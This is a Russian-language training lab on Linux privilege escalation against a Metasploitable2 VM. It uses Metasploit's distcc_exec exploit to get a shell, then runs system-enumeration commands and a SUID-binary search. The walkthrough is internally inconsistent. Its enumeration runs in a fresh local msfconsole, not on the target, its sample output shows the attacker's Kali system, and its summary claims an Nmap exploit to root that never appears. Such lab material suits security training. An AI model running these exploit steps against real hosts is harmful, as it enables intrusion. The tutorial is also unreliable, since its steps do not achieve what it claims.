Введение
В этом лабораторном занятии вы научитесь выполнять повышение привилегий на компьютере с операционной системой Linux после успешного входа под учетной записью не-ROOT-пользователя. Хотя в Интернете есть множество руководств по повышению привилегий в Windows, данное лабораторное занятие посвящено именно повышению привилегий в операционной системе Linux.
Подготовить среду
На этом этапе мы запустим необходимые компоненты лабораторной среды, включая контейнер Kali Linux и виртуальную машину Metasploitable2.
- Запустите виртуальную машину Metasploitable2, выполнив следующую команду в терминале:
sudo virsh start Metasploitable2
Подождите, пока целевая машина запустится. Это может занять от 1 до 3 минут.
- Проверьте, запустилась ли виртуальная машина, отправив ping по имени хоста
target:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить отправку ping.
- Запустите контейнер Kali Linux и войдите в его оболочку bash:
docker run -ti --network host b5b709a49cd5 bash
- Внутри контейнера Kali проверьте сетевое соединение, отправив ping по имени хоста
target:
ping 192.168.122.102
Нажмите Ctrl+C, чтобы остановить отправку ping.
Получить первоначальный доступ к целевой машине
На этом этапе мы будем использовать Metasploit Framework (MSF) в контейнере Kali для получения первоначального доступа к целевой машине Metasploitable2.
- Внутри контейнера Kali запустите консоль Metasploit:
cd ~
msfconsole
- В консоли Metasploit используйте эксплойт-модуль
distcc_exec:
use exploit/unix/misc/distcc_exec
- Установите IP-адрес целевого хоста:
set RHOST 192.168.122.102
- Запустите эксплойт для получения доступа к целевой машине:
exploit
После успешного выполнения эксплойта вы должны увидеть открытую сессию командной оболочки, что означает, что вы получили доступ к целевой машине.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Проверить привилегии текущего пользователя
После получения первоначального доступа необходимо проверить привилегии текущего пользователя, чтобы определить, требуется ли дальнейшее повышение привилегий.
- Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
- Проверьте текущего пользователя:
whoami
- Проверьте идентификатор пользователя и информацию о группе:
id
Если идентификатор пользователя не равен 0 (root), вам нужно будет повысить привилегии, чтобы получить административный доступ.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Перечислить системную информацию
Перед попыткой повышения привилегий необходимо собрать информацию о целевой системе, чтобы выявить потенциальные уязвимости.
- Во - первых, если вы не находитесь в консоли Metasploit, вам нужно запустить консоль Metasploit:
cd ~
msfconsole
- Проверьте версию дистрибутива Linux:
lsb_release -a
Вот пример вывода, который вы можете увидеть:
[*] exec: lsb_release -a
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2023.2
Codename: kali-rolling
- Проверьте версию ядра:
uname -a
Вот пример вывода, который вы можете увидеть:
Linux iZj6ceecakbzgu9eomquhhZ 5.15.0-56-generic #62-Ubuntu SMP Tue Nov 22 19:54:14 UTC 2022 x86_64 GNU/Linux
- Найдите файлы с битом SUID, которые потенциально могут быть использованы для повышения привилегий:
find / -perm -u=s -type f 2> /dev/null
В выводе вы должны увидеть бинарный файл /usr/bin/nmap, который имеет известную уязвимость для повышения привилегий в более старых версиях. Нажмите Ctrl+C, чтобы выйти.
Нажмите Ctrl+D, чтобы выйти из консоли Metasploit, а затем начните проверку
Резюме
В этой лабораторной работе вы научились повышать привилегии на машине с Linux после получения первоначального доступа от имени не - root пользователя. Мы начали с настройки среды LabEx с использованием контейнера Kali Linux и виртуальной машины Metasploitable2. Затем мы использовали Metasploit Framework для эксплойта уязвимости Distcc и получения первоначального доступа к целевой машине.
После того, как мы убедились, что не являемся root - пользователем, мы собрали информацию о целевой системе, такую как версия дистрибутива Linux, версия ядра и файлы с битом SUID. Мы определили бинарный файл Nmap как потенциальную уязвимость и эксплойтировали ее, чтобы повысить наши привилегии до root.
Завершив эту лабораторную работу, вы получили практический опыт в процессе повышения привилегий на системах Linux, что является важным навыком в области кибербезопасности. Вы также научились использовать различные команды Linux для сбора информации о системе и эксплойта уязвимостей, а также как использовать уязвимости в программном обеспечении для получения повышенного доступа.
